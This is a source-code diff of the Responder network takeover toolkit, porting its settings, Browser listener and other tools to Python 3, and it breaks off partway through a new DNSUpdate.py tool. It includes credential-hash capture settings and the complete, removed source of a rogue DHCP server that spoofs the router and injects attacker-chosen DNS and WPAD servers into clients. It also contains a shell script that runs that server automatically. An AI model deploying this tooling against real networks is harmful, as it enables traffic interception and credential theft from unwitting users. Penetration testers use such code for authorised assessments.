+		self.DHCPHostname      = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(9)])
+		self.DomainName        = self.Domain + '.LOCAL'
+		self.MachineNego       = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(9)]) +'$@'+self.DomainName
+		self.RPCPort           = random.randrange(45000, 49999)
 		# Auto Ignore List
 		self.AutoIgnore                       = self.toBool(config.get('Responder Core', 'AutoIgnoreAfterSuccess'))
 		self.CaptureMultipleCredentials       = self.toBool(config.get('Responder Core', 'CaptureMultipleCredentials'))
-                self.CaptureMultipleHashFromSameHost  = self.toBool(config.get('Responder Core', 'CaptureMultipleHashFromSameHost'))
+		self.CaptureMultipleHashFromSameHost  = self.toBool(config.get('Responder Core', 'CaptureMultipleHashFromSameHost'))
 		self.AutoIgnoreList                   = []
 
-		# CLI options
-                self.ExternalIP         = options.ExternalIP
-		self.LM_On_Off          = options.LM_On_Off
-		self.WPAD_On_Off        = options.WPAD_On_Off
-		self.Wredirect          = options.Wredirect
-		self.NBTNSDomain        = options.NBTNSDomain
-		self.Basic              = options.Basic
-		self.Finger_On_Off      = options.Finger
-		self.Interface          = options.Interface
-		self.OURIP              = options.OURIP
-		self.Force_WPAD_Auth    = options.Force_WPAD_Auth
-		self.Upstream_Proxy     = options.Upstream_Proxy
-		self.AnalyzeMode        = options.Analyze
-		self.Verbose            = options.Verbose
-		self.ProxyAuth_On_Off   = options.ProxyAuth_On_Off
-		self.CommandLine        = str(sys.argv)
-
-                if self.ExternalIP:
-                        self.ExternalIPAton = socket.inet_aton(self.ExternalIP)
-
-		if self.HtmlToInject is None:
-			self.HtmlToInject = ''
-
-                self.Bind_To         = utils.FindLocalIP(self.Interface, self.OURIP)
-
-                if self.Interface == "ALL":
-                	self.Bind_To_ALL  = True
-                else:
-                        self.Bind_To_ALL  = False
-
-                if self.Interface == "ALL":
-                	self.IP_aton   = socket.inet_aton(self.OURIP)
-                else:
-                	self.IP_aton   = socket.inet_aton(self.Bind_To)
-
-		self.Os_version      = sys.platform
-
 		# Set up Challenge
 		self.NumChal = config.get('Responder Core', 'Challenge')
-                if self.NumChal.lower() == 'random':
-                   self.NumChal = "random"
+		if self.NumChal.lower() == 'random':
+			self.NumChal = "random"
 
-		if len(self.NumChal) is not 16 and not "random":
-			print utils.color("[!] The challenge must be exactly 16 chars long.\nExample: 1122334455667788", 1)
+		if len(self.NumChal) != 16 and self.NumChal != "random":
+			print(utils.color("[!] The challenge must be exactly 16 chars long.\nExample: 1122334455667788", 1))
 			sys.exit(-1)
 
-		self.Challenge = ""
-                if self.NumChal.lower() == 'random':
-                   pass
-                else: 
-		   for i in range(0, len(self.NumChal),2):
-	               self.Challenge += self.NumChal[i:i+2].decode("hex")
+		self.Challenge = b''
+		if self.NumChal.lower() == 'random':
+			pass
+		else:
+			if self.PY2OR3 == 'PY2':
+				for i in range(0, len(self.NumChal),2):
+					self.Challenge += self.NumChal[i:i+2].decode("hex")
+			else:
+					self.Challenge = bytes.fromhex(self.NumChal)
+
 
 		# Set up logging
 		logging.basicConfig(filename=self.SessionLogFile, level=logging.INFO, format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
@@ -226,7 +369,14 @@ class Settings:
 
 		self.AnalyzeLogger = logging.getLogger('Analyze Log')
 		self.AnalyzeLogger.addHandler(ALog_Handler)
-                
+		
+		# First time Responder run?
+		if os.path.isfile(self.ResponderPATH+'/Responder.db'):
+			pass
+		else:
+			#If it's the first time, generate SSL certs for this Responder session and send openssl output to /dev/null
+			Certs = os.system(self.ResponderPATH+"/certs/gen-self-signed-cert.sh >/dev/null 2>&1")
+		
 		try:
 			NetworkCard = subprocess.check_output(["ifconfig", "-a"])
 		except:
@@ -236,10 +386,12 @@ class Settings:
 				NetworkCard = "Error fetching Network Interfaces:", ex
 				pass
 		try:
-			DNS = subprocess.check_output(["cat", "/etc/resolv.conf"])
-		except subprocess.CalledProcessError as ex:
-			DNS = "Error fetching DNS configuration:", ex
-			pass
+			p = subprocess.Popen('resolvectl', stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
+			DNS = p.stdout.read()
+		except:
+			p = subprocess.Popen(['cat', '/etc/resolv.conf'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
+			DNS = p.stdout.read()
+
 		try:
 			RoutingInfo = subprocess.check_output(["netstat", "-rn"])
 		except:
@@ -249,12 +401,12 @@ class Settings:
 				RoutingInfo = "Error fetching Routing information:", ex
 				pass
 
-		Message = "Current environment is:\nNetwork Config:\n%s\nDNS Settings:\n%s\nRouting info:\n%s\n\n"%(NetworkCard,DNS,RoutingInfo)
+		Message = "%s\nCurrent environment is:\nNetwork Config:\n%s\nDNS Settings:\n%s\nRouting info:\n%s\n\n"%(utils.HTTPCurrentDate(), NetworkCard.decode('latin-1'),DNS.decode('latin-1'),RoutingInfo.decode('latin-1'))
 		try:
 			utils.DumpConfig(self.ResponderConfigDump, Message)
-			utils.DumpConfig(self.ResponderConfigDump,str(self))
+			#utils.DumpConfig(self.ResponderConfigDump,str(self))
 		except AttributeError as ex:
-			print "Missing Module:", ex
+			print("Missing Module:", ex)
 			pass
 
 def init():

tools/BrowserListener.py

@@ -1,5 +1,5 @@
 #!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
+# This file is part of Responder, a network take-over set of tools
 # created and maintained by Laurent Gaffie.
 # email: laurent.gaffie@gmail.com
 # This program is free software: you can redistribute it and/or modify
@@ -16,103 +16,103 @@
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 import sys
 import os
-import thread
+import _thread
 
 BASEDIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))
 sys.path.insert(0, BASEDIR)
 
 from servers.Browser import WorkstationFingerPrint, RequestType, RAPThisDomain, RapFinger
-from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler
+from socketserver import UDPServer, ThreadingMixIn, BaseRequestHandler
 from threading import Lock
 from utils import *
 
 def ParseRoles(data):
-	if len(data) != 4:
-		return ''
+    if len(data) != 4:
+        return ''
 
-	AllRoles = {
-		'Workstation':           (ord(data[0]) >> 0) & 1,
-		'Server':                (ord(data[0]) >> 1) & 1,
-		'SQL':                   (ord(data[0]) >> 2) & 1,
-		'Domain Controller':     (ord(data[0]) >> 3) & 1,
-		'Backup Controller':     (ord(data[0]) >> 4) & 1,
-		'Time Source':           (ord(data[0]) >> 5) & 1,
-		'Apple':                 (ord(data[0]) >> 6) & 1,
-		'Novell':                (ord(data[0]) >> 7) & 1,
-		'Member':                (ord(data[1]) >> 0) & 1,
-		'Print':                 (ord(data[1]) >> 1) & 1,
-		'Dialin':                (ord(data[1]) >> 2) & 1,
-		'Xenix':                 (ord(data[1]) >> 3) & 1,
-		'NT Workstation':        (ord(data[1]) >> 4) & 1,
-		'WfW':                   (ord(data[1]) >> 5) & 1,
-		'Unused':                (ord(data[1]) >> 6) & 1,
-		'NT Server':             (ord(data[1]) >> 7) & 1,
-		'Potential Browser':     (ord(data[2]) >> 0) & 1,
-		'Backup Browser':        (ord(data[2]) >> 1) & 1,
-		'Master Browser':        (ord(data[2]) >> 2) & 1,
-		'Domain Master Browser': (ord(data[2]) >> 3) & 1,
-		'OSF':                   (ord(data[2]) >> 4) & 1,
-		'VMS':                   (ord(data[2]) >> 5) & 1,
-		'Windows 95+':           (ord(data[2]) >> 6) & 1,
-		'DFS':                   (ord(data[2]) >> 7) & 1,
-		'Local':                 (ord(data[3]) >> 6) & 1,
-		'Domain Enum':           (ord(data[3]) >> 7) & 1,
-	}
+    AllRoles = {
+            'Workstation':           (ord(data[0]) >> 0) & 1,
+            'Server':                (ord(data[0]) >> 1) & 1,
+            'SQL':                   (ord(data[0]) >> 2) & 1,
+            'Domain Controller':     (ord(data[0]) >> 3) & 1,
+            'Backup Controller':     (ord(data[0]) >> 4) & 1,
+            'Time Source':           (ord(data[0]) >> 5) & 1,
+            'Apple':                 (ord(data[0]) >> 6) & 1,
+            'Novell':                (ord(data[0]) >> 7) & 1,
+            'Member':                (ord(data[1]) >> 0) & 1,
+            'Print':                 (ord(data[1]) >> 1) & 1,
+            'Dialin':                (ord(data[1]) >> 2) & 1,
+            'Xenix':                 (ord(data[1]) >> 3) & 1,
+            'NT Workstation':        (ord(data[1]) >> 4) & 1,
+            'WfW':                   (ord(data[1]) >> 5) & 1,
+            'Unused':                (ord(data[1]) >> 6) & 1,
+            'NT Server':             (ord(data[1]) >> 7) & 1,
+            'Potential Browser':     (ord(data[2]) >> 0) & 1,
+            'Backup Browser':        (ord(data[2]) >> 1) & 1,
+            'Master Browser':        (ord(data[2]) >> 2) & 1,
+            'Domain Master Browser': (ord(data[2]) >> 3) & 1,
+            'OSF':                   (ord(data[2]) >> 4) & 1,
+            'VMS':                   (ord(data[2]) >> 5) & 1,
+            'Windows 95+':           (ord(data[2]) >> 6) & 1,
+            'DFS':                   (ord(data[2]) >> 7) & 1,
+            'Local':                 (ord(data[3]) >> 6) & 1,
+            'Domain Enum':           (ord(data[3]) >> 7) & 1,
+    }
 
-	return ', '.join(k for k,v in AllRoles.items() if v == 1)
+    return ', '.join(k for k,v in list(AllRoles.items()) if v == 1)
 
 
 class BrowserListener(BaseRequestHandler):
-	def handle(self):
-		data, socket = self.request
+    def handle(self):
+        data, socket = self.request
 
-		lock = Lock()
-		lock.acquire()
+        lock = Lock()
+        lock.acquire()
 
-		DataOffset    = struct.unpack('<H',data[139:141])[0]
-		BrowserPacket = data[82+DataOffset:]
-		ReqType       = RequestType(BrowserPacket[0])
+        DataOffset    = struct.unpack('<H',data[139:141])[0]
+        BrowserPacket = data[82+DataOffset:]
+        ReqType       = RequestType(BrowserPacket[0])
 
-		Domain = Decode_Name(data[49:81])
-		Name   = Decode_Name(data[15:47])
-		Role1  = NBT_NS_Role(data[45:48])
-		Role2  = NBT_NS_Role(data[79:82])
-		Fprint = WorkstationFingerPrint(data[190:192])
-		Roles  = ParseRoles(data[192:196])
+        Domain = Decode_Name(data[49:81])
+        Name   = Decode_Name(data[15:47])
+        Role1  = NBT_NS_Role(data[45:48])
+        Role2  = NBT_NS_Role(data[79:82])
+        Fprint = WorkstationFingerPrint(data[190:192])
+        Roles  = ParseRoles(data[192:196])
 
-		print text("[BROWSER] Request Type : %s" % ReqType)
-		print text("[BROWSER] Address      : %s" % self.client_address[0])
-		print text("[BROWSER] Domain       : %s" % Domain)
-		print text("[BROWSER] Name         : %s" % Name)
-		print text("[BROWSER] Main Role    : %s" % Role1)
-		print text("[BROWSER] 2nd Role     : %s" % Role2)
-		print text("[BROWSER] Fingerprint  : %s" % Fprint)
-		print text("[BROWSER] Role List    : %s" % Roles)
+        print(text("[BROWSER] Request Type : %s" % ReqType))
+        print(text("[BROWSER] Address      : %s" % self.client_address[0]))
+        print(text("[BROWSER] Domain       : %s" % Domain))
+        print(text("[BROWSER] Name         : %s" % Name))
+        print(text("[BROWSER] Main Role    : %s" % Role1))
+        print(text("[BROWSER] 2nd Role     : %s" % Role2))
+        print(text("[BROWSER] Fingerprint  : %s" % Fprint))
+        print(text("[BROWSER] Role List    : %s" % Roles))
 
-		RAPThisDomain(self.client_address[0], Domain)
+        RAPThisDomain(self.client_address[0], Domain)
 
-		lock.release()
+        lock.release()
 
 
 class ThreadingUDPServer(ThreadingMixIn, UDPServer):
-	def server_bind(self):
-		self.allow_reuse_address = 1
-		UDPServer.server_bind(self)
+    def server_bind(self):
+        self.allow_reuse_address = 1
+        UDPServer.server_bind(self)
 
 def serve_thread_udp_broadcast(host, port, handler):
-	try:
-		server = ThreadingUDPServer(('', port), handler)
-		server.serve_forever()
-	except:
-		print "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
+    try:
+        server = ThreadingUDPServer(('', port), handler)
+        server.serve_forever()
+    except:
+        print("Error starting UDP server on port " + str(port) + ", check permissions or other servers running.")
 
 if __name__ == "__main__":
-	try:
-		print "Listening for BROWSER datagrams..."
-		thread.start_new(serve_thread_udp_broadcast,('', 138,  BrowserListener))
+    try:
+        print("Listening for BROWSER datagrams...")
+        _thread.start_new(serve_thread_udp_broadcast,('', 138,  BrowserListener))
 
-		while True:
-			time.sleep(1)
+        while True:
+            time.sleep(1)
 
-	except KeyboardInterrupt:
-		sys.exit("\r Exiting...")
+    except KeyboardInterrupt:
+        sys.exit("\r Exiting...")

tools/DHCP.py

@@ -1,318 +0,0 @@
-#!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
-# created and maintained by Laurent Gaffie.
-# email: laurent.gaffie@gmail.com
-# This program is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import sys
-import struct
-import optparse
-import ConfigParser
-import os
-
-BASEDIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))
-sys.path.insert(0, BASEDIR)
-from odict import OrderedDict
-from packets import Packet
-from utils import *
-
-parser = optparse.OptionParser(usage='python %prog -I eth0 -d pwned.com -p 10.20.30.40 -s 10.20.30.1 -r 10.20.40.1', prog=sys.argv[0],)
-parser.add_option('-I', '--interface',  action="store",      help="Interface name to use, example: eth0", metavar="eth0",dest="Interface")
-parser.add_option('-d', '--dnsname',    action="store",      help="DNS name to inject, if you don't want to inject a DNS server, provide the original one.", metavar="pwned.com", default="pwned.com",dest="DNSNAME")
-parser.add_option('-r', '--router',     action="store",      help="The ip address of the router or yours if you want to intercept traffic.", metavar="10.20.1.1",dest="RouterIP")
-parser.add_option('-p', '--primary',    action="store",      help="The ip address of the original primary DNS server or yours", metavar="10.20.1.10",dest="DNSIP")
-parser.add_option('-s', '--secondary',  action="store",      help="The ip address of the original secondary DNS server or yours", metavar="10.20.1.11",dest="DNSIP2")
-parser.add_option('-n', '--netmask',    action="store",      help="The netmask of this network", metavar="255.255.255.0", default="255.255.255.0", dest="Netmask")
-parser.add_option('-w', '--wpadserver', action="store",      help="Your WPAD server string", metavar="\"http://wpadsrv/wpad.dat\"", default="", dest="WPAD")
-parser.add_option('-S',                 action="store_true", help="Spoof the router ip address",dest="Spoof")
-parser.add_option('-R',                 action="store_true", help="Respond to DHCP Requests, inject linux clients (very noisy, this is sent on 255.255.255.255)", dest="Respond_To_Requests")
-options, args = parser.parse_args()
-
-def color(txt, code = 1, modifier = 0):
-	return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
-
-if options.Interface is None:
-	print color("[!]", 1, 1), "-I mandatory option is missing, please provide an interface."
-	exit(-1)
-elif options.RouterIP is None:
-	print color("[!]", 1, 1), "-r mandatory option is missing, please provide the router's IP."
-	exit(-1)
-elif options.DNSIP is None:
-	print color("[!]", 1, 1), "-p mandatory option is missing, please provide the primary DNS server ip address or yours."
-	exit(-1)
-elif options.DNSIP2 is None:
-	print color("[!]", 1, 1), "-s mandatory option is missing, please provide the secondary DNS server ip address or yours."
-	exit(-1)
-
-
-print '#############################################################################'
-print '##                       DHCP INFORM TAKEOVER 0.2                          ##'
-print '##                                                                         ##'
-print '##        By default, this script will only inject a new DNS/WPAD          ##'
-print '##                server to a Windows <= XP/2003 machine.                  ##'
-print '##                                                                         ##'
-print '##     To inject a DNS server/domain/route on a Windows >= Vista and       ##'
-print '##               any linux box, use -R (can be noisy)                      ##'
-print '##                                                                         ##'
-print '##   Use `RespondTo` setting in Responder.conf for in-scope targets only.  ##'
-print '#############################################################################'
-print ''
-print color('[*]', 2, 1), 'Listening for events...'
-
-config = ConfigParser.ConfigParser()
-config.read(os.path.join(BASEDIR,'Responder.conf'))
-RespondTo           = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')])
-DontRespondTo       = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')])
-Interface           = options.Interface
-Responder_IP        = FindLocalIP(Interface, None)
-ROUTERIP            = options.RouterIP
-NETMASK             = options.Netmask
-DHCPSERVER          = Responder_IP
-DNSIP               = options.DNSIP
-DNSIP2              = options.DNSIP2
-DNSNAME             = options.DNSNAME
-WPADSRV             = options.WPAD.strip() + "\\n"
-Spoof               = options.Spoof
-Respond_To_Requests = options.Respond_To_Requests
-
-if Spoof:
-	DHCPSERVER = ROUTERIP
-
-##### IP Header #####
-class IPHead(Packet):
-	fields = OrderedDict([
-		("Version",           "\x45"),
-		("DiffServices",      "\x00"),
-		("TotalLen",          "\x00\x00"),
-		("Ident",             "\x00\x00"),
-		("Flags",             "\x00\x00"),
-		("TTL",               "\x40"),
-		("Protocol",          "\x11"),
-		("Checksum",          "\x00\x00"),
-		("SrcIP",             ""),
-		("DstIP",             ""),
-	])
-
-class UDP(Packet):
-	fields = OrderedDict([
-		("SrcPort",           "\x00\x43"),
-		("DstPort",           "\x00\x44"),
-		("Len",               "\x00\x00"),
-		("Checksum",          "\x00\x00"),
-		("Data",              "\x00\x00"),
-	])
-
-	def calculate(self):
-		self.fields["Len"] = struct.pack(">h",len(str(self.fields["Data"]))+8)
-
-class DHCPACK(Packet):
-	fields = OrderedDict([
-		("MessType",          "\x02"),
-		("HdwType",           "\x01"),
-		("HdwLen",            "\x06"),
-		("Hops",              "\x00"),
-		("Tid",               "\x11\x22\x33\x44"),
-		("ElapsedSec",        "\x00\x00"),
-		("BootpFlags",        "\x00\x00"),
-		("ActualClientIP",    "\x00\x00\x00\x00"),
-		("GiveClientIP",      "\x00\x00\x00\x00"),
-		("NextServerIP",      "\x00\x00\x00\x00"),
-		("RelayAgentIP",      "\x00\x00\x00\x00"),
-		("ClientMac",         "\xff\xff\xff\xff\xff\xff"),
-		("ClientMacPadding",  "\x00" *10),
-		("ServerHostname",    "\x00" * 64),
-		("BootFileName",      "\x00" * 128),
-		("MagicCookie",       "\x63\x82\x53\x63"),
-		("DHCPCode",          "\x35"),              #DHCP Message
-		("DHCPCodeLen",       "\x01"),
-		("DHCPOpCode",        "\x05"),              #Msgtype(ACK)
-		("Op54",              "\x36"),
-		("Op54Len",           "\x04"),
-		("Op54Str",           ""),                  #DHCP Server
-		("Op51",              "\x33"),
-		("Op51Len",           "\x04"),
-		("Op51Str",           "\x00\x01\x51\x80"),  #Lease time, 1 day
-		("Op1",               "\x01"),
-		("Op1Len",            "\x04"),
-		("Op1Str",            ""),                  #Netmask
-		("Op15",              "\x0f"),
-		("Op15Len",           "\x0e"),
-		("Op15Str",           ""),                  #DNS Name
-		("Op3",               "\x03"),
-		("Op3Len",            "\x04"),
-		("Op3Str",            ""),                  #Router
-		("Op6",               "\x06"),
-		("Op6Len",            "\x08"),
-		("Op6Str",            ""),                  #DNS Servers
-		("Op252",             "\xfc"),
-		("Op252Len",          "\x04"),
-		("Op252Str",          ""),                  #Wpad Server
-		("Op255",             "\xff"),
-		("Padding",           "\x00"),
-	])
-
-	def calculate(self):
-		self.fields["Op54Str"]  = socket.inet_aton(DHCPSERVER)
-		self.fields["Op1Str"]   = socket.inet_aton(NETMASK)
-		self.fields["Op3Str"]   = socket.inet_aton(ROUTERIP)
-		self.fields["Op6Str"]   = socket.inet_aton(DNSIP)+socket.inet_aton(DNSIP2)
-		self.fields["Op15Str"]  = DNSNAME
-		self.fields["Op252Str"] = WPADSRV
-		self.fields["Op15Len"]  = struct.pack(">b",len(str(self.fields["Op15Str"])))
-		self.fields["Op252Len"] = struct.pack(">b",len(str(self.fields["Op252Str"])))
-
-class DHCPInformACK(Packet):
-	fields = OrderedDict([
-		("MessType",          "\x02"),
-		("HdwType",           "\x01"),
-		("HdwLen",            "\x06"),
-		("Hops",              "\x00"),
-		("Tid",               "\x11\x22\x33\x44"),
-		("ElapsedSec",        "\x00\x00"),
-		("BootpFlags",        "\x00\x00"),
-		("ActualClientIP",    "\x00\x00\x00\x00"),
-		("GiveClientIP",      "\x00\x00\x00\x00"),
-		("NextServerIP",      "\x00\x00\x00\x00"),
-		("RelayAgentIP",      "\x00\x00\x00\x00"),
-		("ClientMac",         "\xff\xff\xff\xff\xff\xff"),
-		("ClientMacPadding",  "\x00" *10),
-		("ServerHostname",    "\x00" * 64),
-		("BootFileName",      "\x00" * 128),
-		("MagicCookie",       "\x63\x82\x53\x63"),
-		("Op53",              "\x35\x01\x05"),      #Msgtype(ACK)
-		("Op54",              "\x36"),
-		("Op54Len",           "\x04"),
-		("Op54Str",           ""),                  #DHCP Server
-		("Op1",               "\x01"),
-		("Op1Len",            "\x04"),
-		("Op1Str",            ""),                  #Netmask
-		("Op15",              "\x0f"),
-		("Op15Len",           "\x0e"),
-		("Op15Str",           ""),                  #DNS Name
-		("Op3",               "\x03"),
-		("Op3Len",            "\x04"),
-		("Op3Str",            ""),                  #Router
-		("Op6",               "\x06"),
-		("Op6Len",            "\x08"),
-		("Op6Str",            ""),                  #DNS Servers
-		("Op252",             "\xfc"),
-		("Op252Len",          "\x04"),
-		("Op252Str",          ""),                  #Wpad Server.
-		("Op255",             "\xff"),
-	])
-
-	def calculate(self):
-		self.fields["Op54Str"]  = socket.inet_aton(DHCPSERVER)
-		self.fields["Op1Str"]   = socket.inet_aton(NETMASK)
-		self.fields["Op3Str"]   = socket.inet_aton(ROUTERIP)
-		self.fields["Op6Str"]   = socket.inet_aton(DNSIP)+socket.inet_aton(DNSIP2)
-		self.fields["Op15Str"]  = DNSNAME
-		self.fields["Op252Str"] = WPADSRV
-		self.fields["Op15Len"]  = struct.pack(">b",len(str(self.fields["Op15Str"])))
-		self.fields["Op252Len"] = struct.pack(">b",len(str(self.fields["Op252Str"])))
-
-def SpoofIP(Spoof):
-	return ROUTERIP if Spoof else Responder_IP
-
-def RespondToThisIP(ClientIp):
-	if ClientIp.startswith('127.0.0.'):
-		return False
-	elif RespondTo and ClientIp not in RespondTo:
-		return False
-	elif ClientIp in RespondTo or RespondTo == []:
-		if ClientIp not in DontRespondTo:
-			return True
-	return False
-
-def ParseSrcDSTAddr(data):
-	SrcIP = socket.inet_ntoa(data[0][26:30])
-	DstIP = socket.inet_ntoa(data[0][30:34])
-	SrcPort = struct.unpack('>H',data[0][34:36])[0]
-	DstPort = struct.unpack('>H',data[0][36:38])[0]
-	return SrcIP, SrcPort, DstIP, DstPort
-
-def FindIP(data):
-	IP = ''.join(re.findall(r'(?<=\x32\x04)[^EOF]*', data))
-	return ''.join(IP[0:4])
-
-def ParseDHCPCode(data):
-	PTid        = data[4:8]
-	Seconds     = data[8:10]
-	CurrentIP   = socket.inet_ntoa(data[12:16])
-	RequestedIP = socket.inet_ntoa(data[16:20])
-	MacAddr     = data[28:34]
-	MacAddrStr  = ':'.join('%02x' % ord(m) for m in MacAddr).upper()
-	OpCode      = data[242:243]
-	RequestIP   = data[245:249]
-
-	# DHCP Inform
-	if OpCode == "\x08": 
-		IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=socket.inet_aton(CurrentIP))
-		Packet = DHCPInformACK(Tid=PTid, ClientMac=MacAddr, ActualClientIP=socket.inet_aton(CurrentIP),
-								GiveClientIP=socket.inet_aton("0.0.0.0"),
-								NextServerIP=socket.inet_aton("0.0.0.0"),
-								RelayAgentIP=socket.inet_aton("0.0.0.0"),
-								ElapsedSec=Seconds)
-		Packet.calculate()
-		Buffer = UDP(Data = Packet)
-		Buffer.calculate()
-		SendDHCP(str(IP_Header)+str(Buffer), (CurrentIP, 68))
-		return 'Acknowledged DHCP Inform for IP: %s, Req IP: %s, MAC: %s Tid: %s' % (CurrentIP, RequestedIP, MacAddrStr, '0x'+PTid.encode('hex'))
-	elif OpCode == "\x03" and Respond_To_Requests:  # DHCP Request
-		IP = FindIP(data)
-		if IP:
-			IPConv = socket.inet_ntoa(IP)
-			if RespondToThisIP(IPConv):
-				IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=IP)
-				Packet = DHCPACK(Tid=PTid, ClientMac=MacAddr, GiveClientIP=IP, ElapsedSec=Seconds)
-				Packet.calculate()
-				Buffer = UDP(Data = Packet)
-				Buffer.calculate()
-				SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 68))
-				return 'Acknowledged DHCP Request for IP: %s, Req IP: %s, MAC: %s Tid: %s' % (CurrentIP, RequestedIP, MacAddrStr, '0x'+PTid.encode('hex'))
-	elif OpCode == "\x01" and Respond_To_Requests:  # DHCP Discover
-		IP = FindIP(data)
-		if IP:
-			IPConv = socket.inet_ntoa(IP)
-			if RespondToThisIP(IPConv):
-				IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=IP)
-				Packet = DHCPACK(Tid=PTid, ClientMac=MacAddr, GiveClientIP=IP, DHCPOpCode="\x02", ElapsedSec=Seconds)
-				Packet.calculate()
-				Buffer = UDP(Data = Packet)
-				Buffer.calculate()
-				SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 0))
-				return 'Acknowledged DHCP Discover for IP: %s, Req IP: %s, MAC: %s Tid: %s' % (CurrentIP, RequestedIP, MacAddrStr, '0x'+PTid.encode('hex'))
-
-def SendDHCP(packet,Host):
-	s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
-	s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
-	s.sendto(packet, Host)
-
-if __name__ == "__main__":
-	s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
-	s.bind((Interface, 0x0800))
-
-	while True:
-		try:
-			data = s.recvfrom(65535)
-			if data[0][23:24] == "\x11":  # is udp?
-				SrcIP, SrcPort, DstIP, DstPort = ParseSrcDSTAddr(data)
-
-				if SrcPort == 67 or DstPort == 67:
-					ret = ParseDHCPCode(data[0][42:])
-					if ret:
-						print text("[DHCP] %s" % ret)
-
-		except KeyboardInterrupt:
-			sys.exit("\r%s Exiting..." % color('[*]', 2, 1))
-

tools/DHCP_Auto.sh

@@ -1,63 +0,0 @@
-#!/bin/bash
-# This file is part of Responder. laurent.gaffie@gmail.com
-#
-#
-# This program is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program.  If not, see <http://www.gnu.org/licenses/>.
-
-# This script will try to auto-detect network parameters
-# to run the rogue DHCP server, to inject only your IP
-# address as the primary DNS server and WPAD server and
-# leave everything else normal.
-
-if [ -z $1 ]; then
-	echo "usage: $0 <interface>"
-	exit
-fi
-
-if [ $EUID -ne 0 ]; then
-	echo "Must be run as root."
-	exit
-fi
-
-if [ ! -d "/sys/class/net/$1" ]; then
-	echo "Interface does not exist."
-	exit
-fi
-
-INTF=$1
-PATH="$PATH:/sbin"
-IPADDR=`ifconfig $INTF | sed -n 's/inet addr/inet/; s/inet[ :]//p' | awk '{print $1}'`
-NETMASK=`ifconfig $INTF | sed -n 's/.*[Mm]ask[: ]//p' | awk '{print $1}'`
-DOMAIN=`grep -E "^domain |^search " /etc/resolv.conf | sort | head -1 | awk '{print $2}'`
-DNS1=$IPADDR
-DNS2=`grep ^nameserver /etc/resolv.conf | head -1 | awk '{print $2}'`
-ROUTER=`route -n | grep ^0.0.0.0 | awk '{print $2}'`
-WPADSTR="http://$IPADDR/wpad.dat"
-if [ -z "$DOMAIN" ]; then
-	DOMAIN="  "
-fi
-
-echo "Running with parameters:"
-echo "INTERFACE: $INTF"
-echo "IP ADDR: $IPADDR"
-echo "NETMAST: $NETMASK"
-echo "ROUTER IP: $ROUTER"
-echo "DNS1 IP: $DNS1"
-echo "DNS2 IP: $DNS2"
-echo "WPAD: $WPADSTR"
-echo ""
-
-
-echo python DHCP.py -I $INTF -r $ROUTER -p $DNS1 -s $DNS2 -n $NETMASK -d \"$DOMAIN\" -w \"$WPADSTR\"
-python DHCP.py -I $INTF -r $ROUTER -p $DNS1 -s $DNS2 -n $NETMASK -d \"$DOMAIN\" -w \"$WPADSTR\"

tools/DNSUpdate.py

@@ -0,0 +1,185 @@
+#!/usr/bin/env python
+
+import sys
+import argparse
+import getpass
+import re
+import socket
+from impacket.structure import Structure
+import ldap3
+import dns.resolver
+from collections import defaultdict
+
+
+class DNS_RECORD(Structure):
+    """
+    dnsRecord - used in LDAP [MS-DNSP] section 2.3.2.2
+    impacket based structure, all of the below are tuples in format (fieldName, format)
+    """
+    structure = (
+        ('DataLength', '<H-Data'),
+        ('Type', '<H'),
+        ('Version', 'B=5'),
+        ('Rank', 'B'),
+        ('Flags', '<H=0'),
+        ('Serial', '<L'),
+        ('TtlSeconds', '>L'),
+        ('Reserved', '<L=0'),
+        ('TimeStamp', '<L=0'),
+        ('Data', ':')
+    )
+
+
+class DNS_RPC_RECORD_A(Structure):
+    """
+    DNS_RPC_RECORD_A [MS-DNSP] section 2.2.2.2.4.1
+    impacket based structure, all of the below are tuples in format (fieldName, format)
+    """
+    structure = (
+        ('address', ':'),
+    )
+
+class DNS_RPC_RECORD_TS(Structure):
+    """
+    DNS_RPC_RECORD_TS [MS-DNSP] section 2.2.2.2.4.23
+    impacket based structure, all of the below are tuples in format (fieldName, format)
+    """
+    structure = (
+        ('entombedTime', '<Q'),
+    )
+
+def getserial(server, zone):
+    dnsresolver = dns.resolver.Resolver()
+    try:
+        socket.inet_aton(server)
+        dnsresolver.nameservers = [server]
+    except socket.error:
